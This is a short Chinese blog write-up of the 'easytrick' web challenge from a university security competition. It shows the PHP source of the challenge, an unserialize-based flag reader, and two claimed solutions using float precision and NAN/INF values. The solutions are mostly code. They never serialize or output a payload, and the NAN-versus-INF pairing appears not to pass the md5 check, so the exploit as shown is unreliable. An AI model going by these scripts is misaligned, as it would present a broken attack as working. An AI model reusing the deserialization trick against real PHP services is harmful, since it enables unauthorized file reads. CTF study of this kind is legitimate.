CTF easytrick

这是第十三届全国大学生信息安全竞赛(线上初赛)的一道web题

题目的源码是:

<?php 
class trick{ 
    public $trick1; 
    public $trick2; 
    public function __destruct(){ 
        $this->trick1 = (string)$this->trick1; 
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ 
            die("你太长了"); 
        } 
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ 
            echo file_get_contents("/flag"); 
        } 
    } 
} 
highlight_file(__FILE__); 
unserialize($_GET['trick']);

这道题有我已知有两种解法,一种是精度,另一种是靠NAN或者INF来解

<?
class trick{ 
    public $trick1 = 0.1; 
    public $trick2 = 0.100000000000001; 
    public function __destruct(){ 
        $this->trick1 = (string)$this->trick1; 
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ 
            die("你太长了"); 
        } 
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ 
            echo file_get_contents("./flag.txt"); 
        } 
    } 
}

new trick;

  或

<?
class trick{ 
    public $trick1 = NAN; 
    public $trick2 = INF; 
    public function __destruct(){ 
        $this->trick1 = (string)$this->trick1; 
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ 
            die("你太长了"); 
        } 
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ 
            echo file_get_contents("./flag.txt"); 
        } 
    } 
}

new trick;

  

posted @ 2020-10-16 22:09  白烬  阅读(347)  评论(0编辑  收藏  举报